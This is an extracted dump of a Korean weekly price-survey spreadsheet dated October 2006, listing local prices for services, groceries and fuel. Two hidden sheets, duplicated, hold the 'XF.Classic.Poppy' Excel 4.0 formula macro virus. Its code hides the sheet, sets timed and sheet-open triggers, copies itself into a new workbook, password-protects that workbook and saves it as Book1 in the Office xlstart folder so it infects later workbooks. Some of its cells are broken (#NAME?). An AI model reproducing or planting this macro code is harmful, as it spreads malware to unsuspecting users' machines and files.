[27,"공동\n주택관리비","주공 18평1개월\n(공과금 제외)",2,2,{"v":39000,"d":"39,000"},{"v":39000,"d":"39,000"},0,"장미아파트",35000,35000,0,"백합아파트",43000,43000,0]
[28,"양 복\n세탁료","신사복 상·하\n드라이크리닝 1회",2,2,{"v":6150,"d":"6,150"},{"v":6150,"d":"6,150"},0,"크린하우스",6300,6300,0,"금당세탁고",6000,6000,0]
[29,"의복수선료","신사복 바지\n밑단줄임 1회",2,2,{"v":3500,"d":"3,500"},{"v":3500,"d":"3,500"},0,"크린하우스",4000,4000,0,"금당세탁소",3000,3000,0]
[30,"영화관람요\n(방화. 외화)","상영시간 100분정도 1회\n(입장세,문예진흥기금포함)",1,1,{"v":14000,"d":"14,000"},{"v":14000,"d":"14,000"},0,"CGV몰오브점",14000,14000,0,null,0,0,0]
[31,"경기장\n입장료","공공체육시설\n(성인 1인)",1,1,{"v":10000,"d":"10,000"},{"v":10000,"d":"10,000"},0,"축구장",10000,10000,0,null,0,0,0]
[32,"수영장\n이용료","일반성인 1회\n(체육기금 포함)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[33,"볼링장\n이용료","일반성인\n평일오후 1게임",0,0,0,0,0,null,0,0,0,null,0,0,0]
[34,"골프연습장\n이용료","초급(남자회원)1개월\n(레슨비 미포함)",1,1,{"v":130000,"d":"130,000"},{"v":130000,"d":"130,000"},0,null,0,0,0,"백운체력단련장",130000,130000,0]
[35,"노래방\n이용료","일반인 저녁 1시간",1,1,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,null,0,0,0,"가람노래방",15000,15000,0]
[36,"당구장\n이용료","큐선대 일반인 저녁\n1시간",1,1,{"v":7200,"d":"7,200"},{"v":7200,"d":"7,200"},0,null,0,0,0,"백운당구장",7200,7200,0]
[37,"사진촬영료","칼라 반명함 1조\n(상급사진관 3x4)",1,1,{"v":15000,"d":"15,000"},{"v":15000,"d":"15,000"},0,null,0,0,0,"윤스토디오",15000,15000,0]
[38,"사진인화료","디지털사진인화요금,\n현상료 포함",1,1,250,250,0,null,0,0,0,"윤스토디오",250,250,0]
[39,"영상매체대여료","최신판 영화 DVD대여요금",0,0,0,0,0,null,0,0,0,null,0,0,0]
[40,"이용료(컷트)","성인조발 중류급 1회",{"$f":"COUNTIF(J75,\"<>0\")+COUNTIF(N75,\"<>0\")","v":2},2,{"v":13000,"d":"13,000"},{"v":13000,"d":"13,000"},0,"금당이발관",13000,13000,0,"금호이용원",13000,13000,0]
[41,"미용료","성인여자 파마(일반)",2,2,{"v":50000,"d":"50,000"},{"v":50000,"d":"50,000"},0,"헤어하나",60000,60000,0,"헤어모드",40000,40000,0]
[42,"목욕료\n(성인)","대중탕(성인 1회)\n(1회용품 제외)",1,1,{"v":5000,"d":"5,000"},{"v":5000,"d":"5,000"},0,null,0,0,0,"금호목욕탕",5000,5000,0]
[43,"숙박료\n(호텔)","평일, 스탠다드,부가세 및 봉사료 포함",0,0,0,0,0,null,0,0,0,null,0,0,0]
[44,"숙박료\n(여관)","독방, 1박, 욕탕부설",0,0,0,0,0,null,0,0,0,null,0,0,0]
[45,"콘도미니엄\n이용료","25평정도 회원기준\n1실 1일 사용",0,0,{"$f":"IF(D80=0,0,SUM(J80,N80)/D80)","v":0},{"$nulls":3},0,0,0,null,0,0,0]
[46,"PC방\n이용료","1회 이용시",0,0,0,{"$f":"IF(E81=0,0,SUM(K81,O81)/E81)","v":0},{"$f":"G81-F81","v":0},null,0,0,0,null,0,0,0]
[47,"택배이용료","20kg이하, 타지역",1,1,{"v":8000,"d":"8,000"},{"v":8000,"d":"8,000"},0,null,0,0,0,"우체국",8000,8000,0]
[48,"찜질방\n이용료","찜질방(성인 1회)\n(1회용품 제외)",0,0,0,0,0,null,0,0,0,null,0,0,0]
[49,"대입학원비(종합)","대입(4년제)재수생 종합반 수강료",0,0,0,{"$nulls":3},0,0,0,null,0,0,0]
["공산품 등 기타(13개품목)"]
[1,"밀가루","중력분 1등품\n(1봉지 3kg)",{"$f":"COUNTIF(J86,\"<>0\")+COUNTIF(N86,\"<>0\")","v":2},2,{"$f":"IF(D86=0,0,SUM(J86,N86)/D86)","v":{"v":6060,"d":"6,060"}},{"v":6060,"d":"6,060"},{"$f":"G86-F86","v":0},"GS슈퍼",5970,5970,{"$f":"K86-J86","v":0},"웰빙마트",6150,6150,{"$f":"O86-N86","v":0}]
[2,"두부","공장제품 1모",2,2,{"v":1550,"d":"1,550"},{"v":1550,"d":"1,550"},0,"GS슈퍼",1700,1700,0,"웰빙마트",1400,1400,0]
[3,"우유","흰 우유(종이팩) 1개\n200㎖",2,2,{"v":1045,"d":"1,045"},{"v":1045,"d":"1,045"},0,"GS슈퍼",990,990,0,"웰빙마트",1100,1100,0]
[4,"식용유","콩기름 1.8ml",2,2,{"v":8415,"d":"8,415"},{"v":8415,"d":"8,415"},0,"GS슈퍼",6980,6980,0,"웰빙마트",9850,9850,0]
[5,"설탕","정백당 1kg",2,2,{"v":2340,"d":"2,340"},{"v":2340,"d":"2,340"},0,"GS슈퍼",2180,2180,0,"웰빙마트",2500,2500,0]
[6,"생수","플라스틱 1병(500㎖)",2,2,520,520,0,"GS슈퍼",540,540,0,"웰빙마트",500,500,0]
[7,"맥주","1병 500㎖\n(병 보증금 포함)",2,2,{"v":1765,"d":"1,765"},{"v":1765,"d":"1,765"},0,"GS슈퍼",1830,1830,0,"웰빙마트",1700,1700,0]
[8,"소주","1병 360㎖\n(병 보증금 포함)",2,2,{"v":1395,"d":"1,395"},{"v":1395,"d":"1,395"},0,"GS슈퍼",1410,1410,0,"웰빙마트",1380,1380,0]
[9,"등유","주유소 판매 1ℓ",0,0,0,0,0,null,0,0,0,null,0,0,0]
[10,"경유","주유소 판매 1ℓ",0,0,0,0,0,null,0,0,0,null,0,0,0]
[11,"휘발유","주유소 판매 1ℓ\n(무연)",0,0,0,{"$f":"IF(E96=0,0,SUM(K96,O96)/E96)","v":0},0,null,0,0,0,null,0,0,0]
[12,"피아노\n학원비","관인학원\n(초급반 1개월)",1,1,{"v":120000,"d":"120,000"},{"v":120000,"d":"120,000"},0,"예향피아노",120000,120000,0,null,0,0,0]
[13,"미술학원비","초등 저학년 1개월\n(재료비 포함)",1,1,{"v":80000,"d":"80,000"},{"v":80000,"d":"80,000"},0,null,0,0,0,"하트앤아트",80000,80000,0]

{"sheet":"Sheet1","index":7,"n_rows":41,"n_cols":3,"rows_kept":41,"hidden":true}
["주간물가동향(2006.10.31).xls",null,{"$f":"WORKBOOK.HIDE(\"XL4Poppy\")","v":false}]
["Book1"]
["C:\\Program Files\\Microsoft Office\\Office\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[{"$error":"#N/A"},null,{"$f":"RUN(C18)","v":false}]
[null,null,{"$error":"#NAME?"}]
[null,null,{"$f":"#N/A","v":{"$error":"#N/A"}}]
["Classic.Poppy by VicodinES",null,{"$error":"#NAME?"}]
["With Lord Natas",null,{"$error":"#NAME?"}]
["An Excel Formula Macro Virus (XF.Classic)",null,{"$error":"#NAME?"}]
["Hydrocodone/APAP 10-650 For Your Computer",null,{"$f":"RUN(A21)","v":false}]
["(C) The Narkotic Network 1998",null,{"$f":"ON.TIME(\"6:30:00 PM\",\"Hello\")","v":false}]
[null,null,{"$f":"ON.TIME(\"6:30:00 AM\",\"Morning\")","v":false}]
[null,null,{"$f":"ON.SHEET(,\"Poppy\",TRUE)","v":false}]
["**Simple Payload**",null,{"$error":"#NAME?"}]
[{"$f":"ALERT(\"XF.Classic.Poppy by VicodinES\",2)","v":false}]
[{"$f":"ALERT(\"ⓒ 1998 The Narkotic Network\",2)","v":false}]
[{"$error":"#NAME?"},null,"**Set Our Values and Paths**"]
[null,null,{"$error":"#NAME?"}]
[null,null,{"$error":"#NAME?"}]
["**Add New Workbook, Infect It, Save It As Book1.xls**",null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]
[{"$f":"#N/A","v":{"$error":"#N/A"}},null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"}]
[{"$error":"#NAME?"}]
[{"$f":"NEW(1)","v":false},null,"**Infect Workbook**"]
[{"$f":"WORKBOOK.INSERT(1)","v":false},null,{"$f":"RUN(C19)","v":false}]
[{"$f":"WORKBOOK.INSERT(1)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"ACTIVATE.PREV()","v":false},null,{"$f":"#N/A","v":{"$error":"#N/A"}}]
[{"$f":"RUN(C18)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.COPY(\"XL4Poppy\",A1)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.NAME(\"Sheet3\",\"Sheet99\")","v":false},null,{"$f":"ACTIVATE.PREV()","v":false}]
[{"$f":"WORKBOOK.NAME(\"Sheet1\",\"Sheet3\")","v":false},null,{"$f":"RUN(C19)","v":false}]
[{"$f":"WORKBOOK.NAME(\"Sheet99\",\"Sheet1\")","v":false},null,{"$f":"WORKBOOK.COPY(\"XL4Poppy\",A1)","v":false}]
[{"$f":"PROTECT.DOCUMENT(TRUE,,\"VicodinES\",TRUE)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.PREV()","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.PREV()","v":false}]
[{"$f":"WORKBOOK.PREV()","v":false}]
[{"$f":"SAVE.AS(A3)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"FILE.CLOSE()","v":false},null,{"$f":"MESSAGE(TRUE,\"VicodinES and Lord Natas greet you a good morning!\")","v":false}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]

{"sheet":"--------","index":8,"n_rows":41,"n_cols":3,"rows_kept":41,"hidden":true}
["주간물가동향(2006.10.31).xls",null,{"$f":"WORKBOOK.HIDE(\"XL4Poppy\")","v":false}]
["Book1"]
["C:\\Program Files\\Microsoft Office\\Office\\xlstart\\Book1.",null,"**Auto and On Sheet Starts Here**"]
[{"$error":"#N/A"},null,{"$f":"RUN(C18)","v":false}]
[null,null,{"$error":"#NAME?"}]
[null,null,{"$f":"#N/A","v":{"$error":"#N/A"}}]
["Classic.Poppy by VicodinES",null,{"$error":"#NAME?"}]
["With Lord Natas",null,{"$error":"#NAME?"}]
["An Excel Formula Macro Virus (XF.Classic)",null,{"$error":"#NAME?"}]
["Hydrocodone/APAP 10-650 For Your Computer",null,{"$f":"RUN(A21)","v":false}]
["(C) The Narkotic Network 1998",null,{"$f":"ON.TIME(\"6:30:00 PM\",\"Hello\")","v":false}]
[null,null,{"$f":"ON.TIME(\"6:30:00 AM\",\"Morning\")","v":false}]
[null,null,{"$f":"ON.SHEET(,\"Poppy\",TRUE)","v":false}]
["**Simple Payload**",null,{"$error":"#NAME?"}]
[{"$f":"ALERT(\"XF.Classic.Poppy by VicodinES\",2)","v":false}]
[{"$f":"ALERT(\"ⓒ 1998 The Narkotic Network\",2)","v":false}]
[{"$error":"#NAME?"},null,"**Set Our Values and Paths**"]
[null,null,{"$error":"#NAME?"}]
[null,null,{"$error":"#NAME?"}]
["**Add New Workbook, Infect It, Save It As Book1.xls**",null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]
[{"$f":"#N/A","v":{"$error":"#N/A"}},null,{"$error":"#NAME?"}]
[{"$error":"#NAME?"}]
[{"$error":"#NAME?"}]
[{"$f":"NEW(1)","v":false},null,"**Infect Workbook**"]
[{"$f":"WORKBOOK.INSERT(1)","v":false},null,{"$f":"RUN(C19)","v":false}]
[{"$f":"WORKBOOK.INSERT(1)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"ACTIVATE.PREV()","v":false},null,{"$f":"#N/A","v":{"$error":"#N/A"}}]
[{"$f":"RUN(C18)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.COPY(\"XL4Poppy\",A1)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.NAME(\"Sheet3\",\"Sheet99\")","v":false},null,{"$f":"ACTIVATE.PREV()","v":false}]
[{"$f":"WORKBOOK.NAME(\"Sheet1\",\"Sheet3\")","v":false},null,{"$f":"RUN(C19)","v":false}]
[{"$f":"WORKBOOK.NAME(\"Sheet99\",\"Sheet1\")","v":false},null,{"$f":"WORKBOOK.COPY(\"XL4Poppy\",A1)","v":false}]
[{"$f":"PROTECT.DOCUMENT(TRUE,,\"VicodinES\",TRUE)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.PREV()","v":false},null,{"$error":"#NAME?"}]
[{"$f":"WORKBOOK.PREV()","v":false}]
[{"$f":"WORKBOOK.PREV()","v":false}]
[{"$f":"SAVE.AS(A3)","v":false},null,{"$error":"#NAME?"}]
[{"$f":"FILE.CLOSE()","v":false},null,{"$f":"MESSAGE(TRUE,\"VicodinES and Lord Natas greet you a good morning!\")","v":false}]
[{"$error":"#NAME?"},null,{"$error":"#NAME?"}]

{"sheet":"Sheet2","index":9,"n_rows":17,"n_cols":8,"rows_kept":17,"merged":[[1,1,2,1],[1,2,2,2],[1,3,2,3],[1,4,1,6],[1,7,2,7],[3,1,12,1],[14,1,15,1]]}
[]
[null,"구 분","품 목","규 격","가격 조사 결과 (단위:원)",null,null,"비 고"]
[{"$nulls":4},"전주","금 주","등락가"]
[null,"농산물","무","상품 1개 1kg",{"$f":"총괄!F8","v":{"v":1554,"d":"1,554"}},{"$f":"총괄!G8","v":{"v":1487.5833333333333,"d":"1,488"}},{"$f":"총괄!H8","v":{"v":-66.41666666666674,"d":"-66"}}]
[null,null,"양파","1망(1kg)",{"$f":"총괄!F13","v":{"v":2935,"d":"2,935"}},{"$f":"총괄!G13","v":{"v":2845,"d":"2,845"}},{"$f":"총괄!H13","v":-90}]
[null,null,"배추","1포기 3kg",{"$f":"총괄!F18","v":{"v":4308.833333333333,"d":"4,309"}},{"$f":"총괄!G18","v":{"v":4293.833333333333,"d":"4,294"}},{"$f":"총괄!H18","v":-15}]
[null,null,"오이","상품 3개",{"$f":"총괄!F14","v":{"v":3677.0833333333335,"d":"3,677"}},{"$f":"총괄!G14","v":{"v":3448.75,"d":"3,449"}},{"$f":"총괄!H14","v":{"v":-228.33333333333348,"d":"-228"}}]
[null,null,"상추","양상추 500g",{"$f":"총괄!F10","v":{"v":2387.8333333333335,"d":"2,388"}},{"$f":"총괄!G10","v":{"v":2321.6666666666665,"d":"2,322"}},{"$f":"총괄!H10","v":{"v":-66.16666666666697,"d":"-66"}}]
[null,null,"애호박","상품1개(250~300g)",{"$f":"총괄!F11","v":{"v":1627.5,"d":"1,628"}},{"$f":"총괄!G11","v":{"v":1610,"d":"1,610"}},{"$f":"총괄!H11","v":{"v":-17.5,"d":"-18"}}]
[null,null,"마늘","깐것 상품 1kg",{"$f":"총괄!F16","v":{"v":10866.666666666666,"d":"10,867"}},{"$f":"총괄!G16","v":{"v":11457.5,"d":"11,458"}},{"$f":"총괄!H16","v":{"v":590.8333333333339,"d":"591"}}]
[null,null,"감자","흰색1kg",{"$f":"총괄!F17","v":{"v":6310.833333333333,"d":"6,311"}},{"$f":"총괄!G17","v":{"v":6185.833333333333,"d":"6,186"}},{"$f":"총괄!H17","v":-125}]
[null,null,"배","상품1개(650~700g)",{"$f":"총괄!F21","v":{"v":3631.6666666666665,"d":"3,632"}},{"$f":"총괄!G21","v":{"v":3250.5833333333335,"d":"3,251"}},{"$f":"총괄!H21","v":{"v":-381.08333333333303,"d":"-381"}}]
[null,null,"달걀","특란30개 한판",{"$f":"총괄!F27","v":{"v":7209.166666666667,"d":"7,209"}},{"$f":"총괄!G27","v":{"v":7451.666666666667,"d":"7,452"}},{"$f":"총괄!H27","v":{"v":242.5,"d":"243"}}]
[null,"축산물","쇠고기(한우)","등심 600g(상등육)",{"$f":"총괄!F23","v":{"v":69861.5,"d":"69,862"}},{"$f":"총괄!G23","v":{"v":67928.16666666667,"d":"67,928"}},{"$f":"총괄!H23","v":{"v":-1933.3333333333285,"d":"-1,933"}}]
[null,"수산물","명태","40cm1마리",{"$f":"총괄!F30","v":{"v":4383.333333333333,"d":"4,383"}},{"$f":"총괄!G30","v":{"v":4383.333333333333,"d":"4,383"}},{"$f":"총괄!H30","v":0}]
[null,null,"조기","15cm1마리",{"$f":"총괄!F28","v":{"v":2004.4166666666667,"d":"2,004"}},{"$f":"총괄!G28","v":{"v":1921.0833333333333,"d":"1,921"}},{"$f":"총괄!H28","v":{"v":-83.33333333333348,"d":"-83"}}]
[null,"공산품등","휘발유","주유소 판매 1ℓ",{"$f":"총괄!F96","v":{"v":1658.7,"d":"165870.00%"}},{"$f":"총괄!G96","v":{"v":1655.8,"d":"165580.00%"}},{"$f":"총괄!H96","v":{"v":-2.900000000000091,"d":"-290.00%"}}]